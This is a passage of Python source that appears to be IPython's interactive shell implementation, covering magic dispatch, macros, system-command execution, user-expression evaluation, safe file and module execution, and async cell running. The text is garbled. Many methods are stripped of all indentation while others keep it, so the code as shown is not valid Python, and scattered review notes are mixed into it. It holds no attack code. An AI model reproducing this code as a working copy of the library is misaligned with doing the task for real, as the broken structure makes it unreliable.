        self.magics_manager.register_function(
            func, magic_kind=magic_kind, magic_name=magic_name
        )
def run_line_magic(self, magic_name, line, _stack_depth=1):
"""Execute the given line magic.
Parameters
----------
magic_name : str
Name of the desired magic function, without '%' prefix.
line : str
The rest of the input line as a single string.
_stack_depth : int
If run_line_magic() is called from magic() then _stack_depth=2.
This is added to ensure backward compatibility for use of 'get_ipython().magic()'
"""
fn = self.find_line_magic(magic_name)
if fn is None:
cm = self.find_cell_magic(magic_name)
etpl = "Line magic function `%%%s` not found%s."
extra = '' if cm is None else (' (But cell magic `%%%%%s` exists, '
'did you mean that instead?)' % magic_name )
raise UsageError(etpl % (magic_name, extra))
else:
# Note: this is the distance in the stack to the user's frame.
# This will need to be updated if the internal calling logic gets
# refactored, or else we'll be expanding the wrong variables.
# Determine stack_depth depending on where run_line_magic() has been called
stack_depth = _stack_depth
if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
# magic has opted out of var_expand
magic_arg_s = line
else:
magic_arg_s = self.var_expand(line, stack_depth)
# Put magic args in a list so we can call with f(*a) syntax
args = [magic_arg_s]
kwargs = {}
# Grab local namespace if we need it:
if getattr(fn, "needs_local_scope", False):
kwargs['local_ns'] = self.get_local_scope(stack_depth)
with self.builtin_trap:
result = fn(*args, **kwargs)
return result
def get_local_scope(self, stack_depth):
"""Get local scope at given stack depth.
Parameters
----------
stack_depth : int
Depth relative to calling frame
"""
return sys._getframe(stack_depth + 1).f_locals
    def run_cell_magic(self, magic_name, line, cell):
        """Execute the given cell magic.

        Parameters
        ----------
        magic_name : str
            Name of the desired magic function, without '%' prefix.
        line : str
            The rest of the first input line as a single string.
        cell : str
            The body of the cell as a (possibly multiline) string.

        Raises
        ------
        UsageError
            If the magic does not exist, or exists only as a line magic,
            or the cell body is empty.
        """
        fn = self.find_cell_magic(magic_name)
        if fn is None:
            # Suggest the same-named line magic, if one exists.
            lm = self.find_line_magic(magic_name)
            etpl = "Cell magic `%%{0}` not found{1}."
            extra = '' if lm is None else (' (But line magic `%{0}` exists, '
                            'did you mean that instead?)'.format(magic_name))
            raise UsageError(etpl.format(magic_name, extra))
        elif cell == '':
            message = '%%{0} is a cell magic, but the cell body is empty.'.format(magic_name)
            if self.find_line_magic(magic_name) is not None:
                message += ' Did you mean the line magic %{0} (single %)?'.format(magic_name)
            raise UsageError(message)
        else:
            # Note: this is the distance in the stack to the user's frame.
            # This will need to be updated if the internal calling logic gets
            # refactored, or else we'll be expanding the wrong variables.
            stack_depth = 2
            if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
                # magic has opted out of var_expand
                magic_arg_s = line
            else:
                magic_arg_s = self.var_expand(line, stack_depth)
            kwargs = {}
            if getattr(fn, "needs_local_scope", False):
                kwargs['local_ns'] = self.user_ns

            with self.builtin_trap:
                args = (magic_arg_s, cell)
                result = fn(*args, **kwargs)
            return result
def find_line_magic(self, magic_name):
"""Find and return a line magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['line'].get(magic_name)
def find_cell_magic(self, magic_name):
"""Find and return a cell magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['cell'].get(magic_name)
def find_magic(self, magic_name, magic_kind='line'):
"""Find and return a magic of the given type by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics[magic_kind].get(magic_name)
def magic(self, arg_s):
"""DEPRECATED. Use run_line_magic() instead.
Call a magic function by name.
Input: a string containing the name of the magic function to call and
any additional arguments to be passed to the magic.
magic('name -opt foo bar') is equivalent to typing at the ipython
prompt:
In[1]: %name -opt foo bar
To call a magic without arguments, simply use magic('name').
This provides a proper Python function to call IPython's magics in any
valid Python code you can type at the interpreter, including loops and
compound statements.
"""
# TODO: should we issue a loud deprecation warning here?
magic_name, _, magic_arg_s = arg_s.partition(' ')
magic_name = magic_name.lstrip(prefilter.ESC_MAGIC)
return self.run_line_magic(magic_name, magic_arg_s, _stack_depth=2)
#-------------------------------------------------------------------------
# Things related to macros
#-------------------------------------------------------------------------
    def define_macro(self, name, themacro):
        """Define a new macro

        Parameters
        ----------
        name : str
            The name of the macro.
        themacro : str or Macro
            The action to do upon invoking the macro. If a string, a new
            Macro object is created by passing the string to it.

        Raises
        ------
        ValueError
            If ``themacro`` is neither a string nor a Macro instance.
        """
        from IPython.core import macro

        # Coerce plain strings into Macro objects.
        if isinstance(themacro, str):
            themacro = macro.Macro(themacro)
        if not isinstance(themacro, macro.Macro):
            raise ValueError('A macro must be a string or a Macro instance.')
        # Macros are stored directly in the user namespace under their name.
        self.user_ns[name] = themacro
#-------------------------------------------------------------------------
# Things related to the running of system commands
#-------------------------------------------------------------------------
def system_piped(self, cmd):
"""Call the given cmd in a subprocess, piping stdout/err
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported. Should not be a command that expects input
other than simple text.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
# We do not support backgrounding processes because we either use
# pexpect or pipes to read from. Users can always just call
# os.system() or use ip.system=ip.system_raw
# if they really want a background process.
raise OSError("Background processes not supported.")
# we explicitly do NOT return the subprocess status code, because
# a non-None value would trigger :func:`sys.displayhook` calls.
# Instead, we store the exit_code in user_ns.
self.user_ns['_exit_code'] = system(self.var_expand(cmd, depth=1))
    def system_raw(self, cmd):
        """Call the given cmd in a subprocess using os.system on Windows or
        subprocess.call using the system shell on other platforms.

        Parameters
        ----------
        cmd : str
            Command to execute.
        """
        cmd = self.var_expand(cmd, depth=1)
        # protect os.system from UNC paths on Windows, which it can't handle:
        if sys.platform == 'win32':
            from IPython.utils._process_win32 import AvoidUNCPath
            with AvoidUNCPath() as path:
                if path is not None:
                    cmd = '"pushd %s &&"%s' % (path, cmd)
                try:
                    ec = os.system(cmd)
                except KeyboardInterrupt:
                    print('\n' + self.get_exception_only(), file=sys.stderr)
                    # -2 mirrors the negative-signal convention used below
                    # (control-c is SIGINT, signal number 2).
                    ec = -2
        else:
            # For posix the result of the subprocess.call() below is an exit
            # code, which by convention is zero for success, positive for
            # program failure. Exit codes above 128 are reserved for signals,
            # and the formula for converting a signal to an exit code is usually
            # signal_number+128. To more easily differentiate between exit
            # codes and signals, ipython uses negative numbers. For instance
            # since control-c is signal 2 but exit code 130, ipython's
            # _exit_code variable will read -2. Note that some shells like
            # csh and fish don't follow sh/bash conventions for exit codes.
            executable = os.environ.get('SHELL', None)
            try:
                # Use env shell instead of default /bin/sh
                ec = subprocess.call(cmd, shell=True, executable=executable)
            except KeyboardInterrupt:
                # intercept control-C; a long traceback is not useful here
                print('\n' + self.get_exception_only(), file=sys.stderr)
                ec = 130
            if ec > 128:
                ec = -(ec - 128)

        # We explicitly do NOT return the subprocess status code, because
        # a non-None value would trigger :func:`sys.displayhook` calls.
        # Instead, we store the exit_code in user_ns. Note the semantics
        # of _exit_code: for control-c, _exit_code == -signal.SIGINT,
        # but raising SystemExit(_exit_code) will give status 254!
        self.user_ns['_exit_code'] = ec
# use piped system by default, because it is better behaved
system = system_piped
def getoutput(self, cmd, split=True, depth=0):
"""Get output (possibly including stderr) from a subprocess.
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported.
split : bool, optional
If True, split the output into an IPython SList. Otherwise, an
IPython LSString is returned. These are objects similar to normal
lists and strings, with a few convenience attributes for easier
manipulation of line-based output. You can use '?' on them for
details.
depth : int, optional
How many frames above the caller are the local variables which should
be expanded in the command string? The default (0) assumes that the
expansion variables are in the stack frame calling this function.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
raise OSError("Background processes not supported.")
out = getoutput(self.var_expand(cmd, depth=depth+1))
if split:
out = SList(out.splitlines())
else:
out = LSString(out)
return out
#-------------------------------------------------------------------------
# Things related to aliases
#-------------------------------------------------------------------------
def init_alias(self):
self.alias_manager = AliasManager(shell=self, parent=self)
self.configurables.append(self.alias_manager)
#-------------------------------------------------------------------------
# Things related to extensions
#-------------------------------------------------------------------------
def init_extension_manager(self):
self.extension_manager = ExtensionManager(shell=self, parent=self)
self.configurables.append(self.extension_manager)
#-------------------------------------------------------------------------
# Things related to payloads
#-------------------------------------------------------------------------
def init_payload(self):
self.payload_manager = PayloadManager(parent=self)
self.configurables.append(self.payload_manager)
#-------------------------------------------------------------------------
# Things related to the prefilter
#-------------------------------------------------------------------------
def init_prefilter(self):
self.prefilter_manager = PrefilterManager(shell=self, parent=self)
self.configurables.append(self.prefilter_manager)
# Ultimately this will be refactored in the new interpreter code, but
# for now, we should expose the main prefilter method (there's legacy
# code out there that may rely on this).
self.prefilter = self.prefilter_manager.prefilter_lines
def auto_rewrite_input(self, cmd):
"""Print to the screen the rewritten form of the user's command.
This shows visual feedback by rewriting input lines that cause
automatic calling to kick in, like::
/f x
into::
------> f(x)
after the user's input prompt. This helps the user understand that the
input line was transformed automatically by IPython.
"""
if not self.show_rewritten_input:
return
# This is overridden in TerminalInteractiveShell to use fancy prompts
print("------> " + cmd)
#-------------------------------------------------------------------------
# Things related to extracting values/expressions from kernel and user_ns
#-------------------------------------------------------------------------
def _user_obj_error(self):
"""return simple exception dict
for use in user_expressions
"""
etype, evalue, tb = self._get_exc_info()
stb = self.InteractiveTB.get_exception_only(etype, evalue)
exc_info = {
u'status' : 'error',
u'traceback' : stb,
u'ename' : etype.__name__,
u'evalue' : py3compat.safe_unicode(evalue),
}
return exc_info
def _format_user_obj(self, obj):
"""format a user object to display dict
for use in user_expressions
"""
data, md = self.display_formatter.format(obj)
value = {
'status' : 'ok',
'data' : data,
'metadata' : md,
}
return value
def user_expressions(self, expressions):
"""Evaluate a dict of expressions in the user's namespace.
Parameters
----------
expressions : dict
A dict with string keys and string values. The expression values
should be valid Python expressions, each of which will be evaluated
in the user namespace.
Returns
-------
A dict, keyed like the input expressions dict, with the rich mime-typed
display_data of each value.
"""
out = {}
user_ns = self.user_ns
global_ns = self.user_global_ns
for key, expr in expressions.items():
try:
value = self._format_user_obj(eval(expr, global_ns, user_ns))
except:
value = self._user_obj_error()
out[key] = value
return out
#-------------------------------------------------------------------------
# Things related to the running of code
#-------------------------------------------------------------------------
def ex(self, cmd):
"""Execute a normal python statement in user namespace."""
with self.builtin_trap:
exec(cmd, self.user_global_ns, self.user_ns)
def ev(self, expr):
"""Evaluate python expression expr in user namespace.
Returns the result of evaluation
"""
with self.builtin_trap:
return eval(expr, self.user_global_ns, self.user_ns)
    def safe_execfile(self, fname, *where, exit_ignore=False, raise_exceptions=False, shell_futures=False):
        """A safe version of the builtin execfile().

        This version will never throw an exception, but instead print
        helpful error messages to the screen. This only works on pure
        Python files with the .py extension.

        Parameters
        ----------
        fname : string
          The name of the file to be executed.
        where : tuple
          One or two namespaces, passed to execfile() as (globals,locals).
          If only one is given, it is passed as both.
        exit_ignore : bool (False)
          If True, then silence SystemExit for non-zero status (it is always
          silenced for zero status, as it is so common).
        raise_exceptions : bool (False)
          If True raise exceptions everywhere. Meant for testing.
        shell_futures : bool (False)
          If True, the code will share future statements with the interactive
          shell. It will both be affected by previous __future__ imports, and
          any __future__ imports in the code will affect the shell. If False,
          __future__ imports are not shared in either direction.
        """
        fname = os.path.abspath(os.path.expanduser(fname))

        # Make sure we can open the file
        try:
            with open(fname):
                pass
        except:
            warn('Could not open file <%s> for safe execution.' % fname)
            return

        # Find things also in current directory. This is needed to mimic the
        # behavior of running a script from the system command line, where
        # Python inserts the script's directory into sys.path
        dname = os.path.dirname(fname)

        with prepended_to_syspath(dname), self.builtin_trap:
            try:
                # Pad `where` with None so a single namespace is accepted;
                # execfile is presumably treating a None locals as "same as
                # globals" (standard exec behavior) — TODO confirm in py3compat.
                glob, loc = (where + (None, ))[:2]
                # Pass our own compiler only when shell_futures is set, so the
                # script shares the shell's __future__ state in that case.
                py3compat.execfile(
                    fname, glob, loc,
                    self.compile if shell_futures else None)
            except SystemExit as status:
                # If the call was made with 0 or None exit status (sys.exit(0)
                # or sys.exit() ), don't bother showing a traceback, as both of
                # these are considered normal by the OS:
                # > python -c'import sys;sys.exit(0)'; echo $?
                # 0
                # > python -c'import sys;sys.exit()'; echo $?
                # 0
                # For other exit status, we show the exception unless
                # explicitly silenced, but only in short form.
                if status.code:
                    if raise_exceptions:
                        raise
                    if not exit_ignore:
                        self.showtraceback(exception_only=True)
            except:
                if raise_exceptions:
                    raise
                # tb offset is 2 because we wrap execfile
                self.showtraceback(tb_offset=2)
    def safe_execfile_ipy(self, fname, shell_futures=False, raise_exceptions=False):
        """Like safe_execfile, but for .ipy or .ipynb files with IPython syntax.

        Parameters
        ----------
        fname : str
          The name of the file to execute.  The filename must have a
          .ipy or .ipynb extension.
        shell_futures : bool (False)
          If True, the code will share future statements with the interactive
          shell. It will both be affected by previous __future__ imports, and
          any __future__ imports in the code will affect the shell. If False,
          __future__ imports are not shared in either direction.
        raise_exceptions : bool (False)
          If True raise exceptions everywhere.  Meant for testing.
        """
        fname = os.path.abspath(os.path.expanduser(fname))

        # Make sure we can open the file
        try:
            with open(fname):
                pass
        except:
            warn('Could not open file <%s> for safe execution.' % fname)
            return

        # Find things also in current directory. This is needed to mimic the
        # behavior of running a script from the system command line, where
        # Python inserts the script's directory into sys.path
        dname = os.path.dirname(fname)

        def get_cells():
            """generator for sequence of code blocks to run"""
            if fname.endswith('.ipynb'):
                from nbformat import read
                nb = read(fname, as_version=4)
                if not nb.cells:
                    return
                for cell in nb.cells:
                    if cell.cell_type == 'code':
                        yield cell.source
            else:
                # A plain .ipy file runs as a single block.
                with open(fname) as f:
                    yield f.read()

        with prepended_to_syspath(dname):
            try:
                for cell in get_cells():
                    # silent=True: no displayhook output/history side effects
                    # while running the file's cells.
                    result = self.run_cell(cell, silent=True, shell_futures=shell_futures)
                    if raise_exceptions:
                        result.raise_error()
                    elif not result.success:
                        # Stop at the first failing cell, like a script would.
                        break
            except:
                if raise_exceptions:
                    raise
                self.showtraceback()
                warn('Unknown failure executing file: <%s>' % fname)
    def safe_run_module(self, mod_name, where):
        """A safe version of runpy.run_module().

        This version will never throw an exception, but instead print
        helpful error messages to the screen.

        `SystemExit` exceptions with status code 0 or None are ignored.

        Parameters
        ----------
        mod_name : string
            The name of the module to be executed.
        where : dict
            The globals namespace.
        """
        try:
            try:
                # run_name="__main__" makes the module behave as if it were
                # run from the command line; alter_sys=True lets runpy adjust
                # sys.argv[0]/sys.modules for the duration of the run.
                where.update(
                    runpy.run_module(str(mod_name), run_name="__main__",
                                     alter_sys=True)
                    )
            except SystemExit as status:
                # Only re-raise a non-zero exit status; sys.exit(0)/sys.exit()
                # count as normal termination.
                if status.code:
                    raise
        except:
            self.showtraceback()
            warn('Unknown failure executing module: <%s>' % mod_name)
    def run_cell(self, raw_cell, store_history=False, silent=False, shell_futures=True):
        """Run a complete IPython cell.

        Parameters
        ----------
        raw_cell : str
          The code (including IPython code such as %magic functions) to run.
        store_history : bool
          If True, the raw and translated cell will be stored in IPython's
          history. For user code calling back into IPython's machinery, this
          should be set to False.
        silent : bool
          If True, avoid side-effects, such as implicit displayhooks and
          and logging. silent=True forces store_history=False.
        shell_futures : bool
          If True, the code will share future statements with the interactive
          shell. It will both be affected by previous __future__ imports, and
          any __future__ imports in the code will affect the shell. If False,
          __future__ imports are not shared in either direction.

        Returns
        -------
        result : :class:`ExecutionResult`
        """
        result = None
        try:
            result = self._run_cell(
                raw_cell, store_history, silent, shell_futures)
        finally:
            # The post-execution hooks must fire even when _run_cell raised;
            # in that case `result` is still None when passed to the event.
            self.events.trigger('post_execute')
            if not silent:
                self.events.trigger('post_run_cell', result)
        return result
def _run_cell(self, raw_cell:str, store_history:bool, silent:bool, shell_futures:bool):
"""Internal method to run a complete IPython cell."""
# we need to avoid calling self.transform_cell multiple time on the same thing
# so we need to store some results:
preprocessing_exc_tuple = None
try:
transformed_cell = self.transform_cell(raw_cell)
except Exception:
transformed_cell = raw_cell
preprocessing_exc_tuple = sys.exc_info()
assert transformed_cell is not None
coro = self.run_cell_async(
raw_cell,
store_history=store_history,
silent=silent,
shell_futures=shell_futures,
transformed_cell=transformed_cell,
preprocessing_exc_tuple=preprocessing_exc_tuple,
)
# run_cell_async is async, but may not actually need an eventloop.
# when this is the case, we want to run it using the pseudo_sync_runner
# so that code can invoke eventloops (for example via the %run , and
# `%paste` magic.
if self.trio_runner:
runner = self.trio_runner
elif self.should_run_async(
raw_cell,
transformed_cell=transformed_cell,
preprocessing_exc_tuple=preprocessing_exc_tuple,
):
runner = self.loop_runner
else:
runner = _pseudo_sync_runner
try:
return runner(coro)
except BaseException as e:
info = ExecutionInfo(raw_cell, store_history, silent, shell_futures)
result = ExecutionResult(info)
result.error_in_exec = e
self.showtraceback(running_compiled_code=True)
return result
return
def should_run_async(
self, raw_cell: str, *, transformed_cell=None, preprocessing_exc_tuple=None
) -> bool:
"""Return whether a cell should be run asynchronously via a coroutine runner
Parameters
----------
raw_cell: str
The code to be executed
Returns
-------
result: bool
Whether the code needs to be run with a coroutine runner or not
.. versionadded: 7.0
"""
if not self.autoawait:
return False
if preprocessing_exc_tuple is not None:
return False
assert preprocessing_exc_tuple is None
if transformed_cell is None:
warnings.warn(
"`should_run_async` will not call `transform_cell`"
" automatically in the future. Please pass the result to"
" `transformed_cell` argument and any exception that happen"
" during the"
"transform in `preprocessing_exc_tuple` in"
" IPython 7.17 and above.",
DeprecationWarning,
stacklevel=2,
)
try:
cell = self.transform_cell(raw_cell)
except Exception:
# any exception during transform will be raised
# prior to execution
return False
else:
cell = transformed_cell
return _should_be_async(cell)
    async def run_cell_async(
        self,
        raw_cell: str,
        store_history=False,
        silent=False,
        shell_futures=True,
        *,
        transformed_cell: Optional[str] = None,
        preprocessing_exc_tuple: Optional[Any] = None
    ) -> ExecutionResult:
        """Run a complete IPython cell asynchronously.

        Parameters
        ----------
        raw_cell : str
          The code (including IPython code such as %magic functions) to run.
        store_history : bool
          If True, the raw and translated cell will be stored in IPython's
          history. For user code calling back into IPython's machinery, this
          should be set to False.
        silent : bool
          If True, avoid side-effects, such as implicit displayhooks and
          and logging. silent=True forces store_history=False.
        shell_futures : bool
          If True, the code will share future statements with the interactive
          shell. It will both be affected by previous __future__ imports, and
          any __future__ imports in the code will affect the shell. If False,
          __future__ imports are not shared in either direction.
        transformed_cell: str
          cell that was passed through transformers
        preprocessing_exc_tuple:
          trace if the transformation failed.

        Returns
        -------
        result : :class:`ExecutionResult`

        .. versionadded: 7.0
        """
        info = ExecutionInfo(
            raw_cell, store_history, silent, shell_futures)
        result = ExecutionResult(info)

        # Empty or whitespace-only input succeeds immediately, touching
        # neither history, nor events, nor the displayhook.
        if (not raw_cell) or raw_cell.isspace():
            self.last_execution_succeeded = True
            self.last_execution_result = result
            return result

        if silent:
            store_history = False

        if store_history:
            result.execution_count = self.execution_count

        def error_before_exec(value):
            # Record a pre-execution failure; the execution counter still
            # advances when history is being stored.
            if store_history:
                self.execution_count += 1
            result.error_before_exec = value
            self.last_execution_succeeded = False
            self.last_execution_result = result
            return result

        self.events.trigger('pre_execute')
        if not silent:
            self.events.trigger('pre_run_cell', info)

        if transformed_cell is None:
            # NOTE(review): the adjacent literals " during the" "transform"
            # render as "thetransform" in this warning — missing space.
            warnings.warn(
                "`run_cell_async` will not call `transform_cell`"
                " automatically in the future. Please pass the result to"
                " `transformed_cell` argument and any exception that happen"
                " during the"
                "transform in `preprocessing_exc_tuple` in"
                " IPython 7.17 and above.",
                DeprecationWarning,
                stacklevel=2,
            )
            # If any of our input transformation (input_transformer_manager or
            # prefilter_manager) raises an exception, we store it in this variable
            # so that we can display the error after logging the input and storing
            # it in the history.
            try:
                cell = self.transform_cell(raw_cell)
            except Exception:
                preprocessing_exc_tuple = sys.exc_info()
                cell = raw_cell  # cell has to exist so it can be stored/logged
            else:
                preprocessing_exc_tuple = None
        else:
            if preprocessing_exc_tuple is None:
                cell = transformed_cell
            else:
                cell = raw_cell

        # Store raw and processed history
        if store_history:
            self.history_manager.store_inputs(self.execution_count,
                                              cell, raw_cell)
        if not silent:
            self.logger.log(cell, raw_cell)

        # Display the exception if input processing failed.
        if preprocessing_exc_tuple is not None:
            self.showtraceback(preprocessing_exc_tuple)
            # NOTE(review): execution_count is incremented here and again
            # inside error_before_exec when store_history is set — looks like
            # a double increment; confirm whether this is intended.
            if store_history:
                self.execution_count += 1
            return error_before_exec(preprocessing_exc_tuple[1])

        # Our own compiler remembers the __future__ environment. If we want to
        # run code with a separate __future__ environment, use the default
        # compiler
        compiler = self.compile if shell_futures else self.compiler_class()

        _run_async = False

        with self.builtin_trap:
            cell_name = self.compile.cache(
                cell, self.execution_count, raw_code=raw_cell
            )

            with self.display_trap:
                # Compile to bytecode
                try:
                    # On Python < 3.8 there is no PyCF_ALLOW_TOP_LEVEL_AWAIT,
                    # so async cells are wrapped in a fake `async def` first.
                    if sys.version_info < (3,8) and self.autoawait:
                        if _should_be_async(cell):
                            # the code AST below will not be user code: we wrap it
                            # in an `async def`. This will likely make some AST
                            # transformer below miss some transform opportunity and
                            # introduce a small coupling to run_code (in which we
                            # bake some assumptions of what _ast_asyncify returns.
                            # they are ways around (like grafting part of the ast
                            # later:
                            #    - Here, return code_ast.body[0].body[1:-1], as well
                            #    as last expression in  return statement which is
                            #    the user code part.
                            #    - Let it go through the AST transformers, and graft
                            #    - it back after the AST transform
                            # But that seem unreasonable, at least while we
                            # do not need it.
                            code_ast = _ast_asyncify(cell, 'async-def-wrapper')
                            _run_async = True
                        else:
                            code_ast = compiler.ast_parse(cell, filename=cell_name)
                    else:
                        code_ast = compiler.ast_parse(cell, filename=cell_name)
                except self.custom_exceptions as e:
                    etype, value, tb = sys.exc_info()
                    self.CustomTB(etype, value, tb)
                    return error_before_exec(e)
                except IndentationError as e:
                    self.showindentationerror()
                    return error_before_exec(e)
                except (OverflowError, SyntaxError, ValueError, TypeError,
                        MemoryError) as e:
                    self.showsyntaxerror()
                    return error_before_exec(e)

                # Apply AST transformations
                try:
                    code_ast = self.transform_ast(code_ast)
                except InputRejected as e:
                    self.showtraceback()
                    return error_before_exec(e)

                # Give the displayhook a reference to our ExecutionResult so it
                # can fill in the output value.
                self.displayhook.exec_result = result

                # Execute the user code
                interactivity = "none" if silent else self.ast_node_interactivity
                if _run_async:
                    interactivity = 'async'

                has_raised = await self.run_ast_nodes(code_ast.body, cell_name,
                       interactivity=interactivity, compiler=compiler, result=result)

                self.last_execution_succeeded = not has_raised
                self.last_execution_result = result

                # Reset this so later displayed values do not modify the
                # ExecutionResult
                self.displayhook.exec_result = None

        if store_history:
            # Write output to the database. Does nothing unless
            # history output logging is enabled.
            self.history_manager.store_output(self.execution_count)
            # Each cell is a *single* input, regardless of how many lines it has
            self.execution_count += 1

        return result
def transform_cell(self, raw_cell):
"""Transform an input cell before parsing it.
Static transformations, implemented in IPython.core.inputtransformer2,
deal with things like ``%magic`` and ``!system`` commands.
These run on all input.
Dynamic transformations, for things like unescaped magics and the exit
autocall, depend on the state of the interpreter.
These only apply to single line inputs.
These string-based transformations are followed by AST transformations;
see :meth:`transform_ast`.
"""
# Static input transformations
cell = self.input_transformer_manager.transform_cell(raw_cell)
if len(cell.splitlines()) == 1:
# Dynamic transformations - only applied for single line commands
with self.builtin_trap:
# use prefilter_lines to handle trailing newlines
# restore trailing newline for ast.parse
cell = self.prefilter_manager.prefilter_lines(cell) + '\n'
lines = cell.splitlines(keepends=True)
for transform in self.input_transformers_post:
lines = transform(lines)
cell = ''.join(lines)
return cell
def transform_ast(self, node):
"""Apply the AST transformations from self.ast_transformers
Parameters
----------
node : ast.Node
The root node to be transformed. Typically called with the ast.Module
produced by parsing user input.
Returns
-------
An ast.Node corresponding to the node it was called with. Note that it
may also modify the passed object, so don't rely on references to the
original AST.
"""
for transformer in self.ast_transformers:
try:
node = transformer.visit(node)
except InputRejected:
# User-supplied AST transformers can reject an input by raising
# an InputRejected. Short-circuit in this case so that we
# don't unregister the transform.
raise
except Exception:
warn("AST transformer %r threw an error. It will be unregistered." % transformer)
self.ast_transformers.remove(transformer)
if self.ast_transformers:
ast.fix_missing_locations(node)
return node
    async def run_ast_nodes(self, nodelist:ListType[AST], cell_name:str, interactivity='last_expr',
                        compiler=compile, result=None):
        """Run a sequence of AST nodes. The execution mode depends on the
        interactivity parameter.

        Parameters
        ----------
        nodelist : list
          A sequence of AST nodes to run.
        cell_name : str
          Will be passed to the compiler as the filename of the cell. Typically
          the value returned by ip.compile.cache(cell).
        interactivity : str
          'all', 'last', 'last_expr' , 'last_expr_or_assign' or 'none',
          specifying which nodes should be run interactively (displaying output
          from expressions). 'last_expr' will run the last node interactively
          only if it is an expression (i.e. expressions in loops or other blocks
          are not displayed) 'last_expr_or_assign' will run the last expression
          or the last assignment. Other values for this parameter will raise a
          ValueError.

          Experimental value: 'async' Will try to run top level interactive
          async/await code in default runner, this will not respect the
          interactivity setting and will only run the last node if it is an
          expression.
        compiler : callable
          A function with the same interface as the built-in compile(), to turn
          the AST nodes into code objects. Default is the built-in compile().
        result : ExecutionResult, optional
          An object to store exceptions that occur during execution.

        Returns
        -------
        True if an exception occurred while running code, False if it finished
        running.
        """
        if not nodelist:
            return

        if interactivity == 'last_expr_or_assign':
            if isinstance(nodelist[-1], _assign_nodes):
                asg = nodelist[-1]
                if isinstance(asg, ast.Assign) and len(asg.targets) == 1:
                    target = asg.targets[0]
                elif isinstance(asg, _single_targets_nodes):
                    target = asg.target
                else:
                    target = None
                if isinstance(target, ast.Name):
                    # Append an extra Expr node reading the assigned name, so
                    # its value is displayed as if typed as a bare expression.
                    nnode = ast.Expr(ast.Name(target.id, ast.Load()))
                    ast.fix_missing_locations(nnode)
                    nodelist.append(nnode)
            # Fall through to the normal 'last_expr' handling below.
            interactivity = 'last_expr'

        _async = False
        if interactivity == 'last_expr':
            if isinstance(nodelist[-1], ast.Expr):
                interactivity = "last"
            else:
                interactivity = "none"

        # Split nodes into a bulk-exec'd prefix and an interactively-run tail.
        if interactivity == 'none':
            to_run_exec, to_run_interactive = nodelist, []
        elif interactivity == 'last':
            to_run_exec, to_run_interactive = nodelist[:-1], nodelist[-1:]
        elif interactivity == 'all':
            to_run_exec, to_run_interactive = [], nodelist
        elif interactivity == 'async':
            to_run_exec, to_run_interactive = [], nodelist
            _async = True
        else:
            raise ValueError("Interactivity was %r" % interactivity)

        try:
            if _async and sys.version_info > (3,8):
                raise ValueError("This branch should never happen on Python 3.8 and above, "
                                 "please try to upgrade IPython and open a bug report with your case.")
            if _async:
                # If interactivity is async the semantics of run_code are
                # completely different Skip usual machinery.
                mod = Module(nodelist, [])
                async_wrapper_code = compiler(mod, cell_name, 'exec')
                exec(async_wrapper_code, self.user_global_ns, self.user_ns)
                # Pull the wrapper function back out of the namespace and run
                # its (rewritten) code object through run_code.
                async_code = removed_co_newlocals(self.user_ns.pop('async-def-wrapper')).__code__
                if (await self.run_code(async_code, result, async_=True)):
                    return True
            else:
                if sys.version_info > (3, 8):
                    # On 3.8+ the compiled code itself tells us whether it is
                    # a coroutine (PyCF_ALLOW_TOP_LEVEL_AWAIT sets CO_COROUTINE).
                    def compare(code):
                        is_async = (inspect.CO_COROUTINE & code.co_flags == inspect.CO_COROUTINE)
                        return is_async
                else:
                    def compare(code):
                        return _async

                # refactor that to just change the mod constructor.
                to_run = []
                for node in to_run_exec:
                    to_run.append((node, 'exec'))

                for node in to_run_interactive:
                    to_run.append((node, 'single'))

                for node,mode in to_run:
                    if mode == 'exec':
                        mod = Module([node], [])
                    elif mode == 'single':
                        # 'single' mode triggers the displayhook on expressions.
                        mod = ast.Interactive([node])
                    with compiler.extra_flags(getattr(ast, 'PyCF_ALLOW_TOP_LEVEL_AWAIT', 0x0) if self.autoawait else 0x0):
                        code = compiler(mod, cell_name, mode)
                        asy = compare(code)
                    if (await self.run_code(code, result, async_=asy)):
                        return True

            # Flush softspace
            if softspace(sys.stdout, 0):
                print()

        except:
            # It's possible to have exceptions raised here, typically by
            # compilation of odd code (such as a naked 'return' outside a
            # function) that did parse but isn't valid. Typically the exception
            # is a SyntaxError, but it's safest just to catch anything and show
            # the user a traceback.

            # We do only one try/except outside the loop to minimize the impact
            # on runtime, and also because if any node in the node list is
            # broken, we should stop execution completely.
            if result:
                result.error_before_exec = sys.exc_info()[1]
            self.showtraceback()
            return True

        return False
def _async_exec(self, code_obj: types.CodeType, user_ns: dict):
"""
Evaluate an asynchronous code object using a code runner
Fake asynchronous execution of code_object in a namespace via a proxy namespace.
Returns coroutine object, which can be executed via async loop runner
WARNING: The semantics of `async_exec` are quite different from `exec`,
in particular you can only pass a single namespace. It also return a
handle to the value of the last things returned by code_object.
"""
return eval(code_obj, user_ns)
    async def run_code(self, code_obj, result=None, *, async_=False):
        """Execute a code object.

        When an exception occurs, self.showtraceback() is called to display a
        traceback.

        Parameters
        ----------
        code_obj : code object
          A compiled code object, to be executed
        result : ExecutionResult, optional
          An object to store exceptions that occur during execution.
        async_ :  Bool (Experimental)
          Attempt to run top-level asynchronous code in a default loop.

        Returns
        -------
        False : successful execution.
        True : an error occurred.
        """
        # special value to say that anything above is IPython and should be
        # hidden.
        __tracebackhide__ = "__ipython_bottom__"
        # Set our own excepthook in case the user code tries to call it
        # directly, so that the IPython crash handler doesn't get triggered
        old_excepthook, sys.excepthook = sys.excepthook, self.excepthook

        # we save the original sys.excepthook in the instance, in case config
        # code (such as magics) needs access to it.
        self.sys_excepthook = old_excepthook
        outflag = True  # happens in more places, so it's easier as default
        try:
            try:
                self.hooks.pre_run_code_hook()
                if async_ and sys.version_info < (3,8):
                    # Pre-3.8 path: run the async wrapper, then display its
                    # final value via a 'single'-mode exec so the displayhook
                    # fires just as it would for a bare expression.
                    last_expr = (await self._async_exec(code_obj, self.user_ns))
                    code = compile('last_expr', 'fake', "single")
                    exec(code, {'last_expr': last_expr})
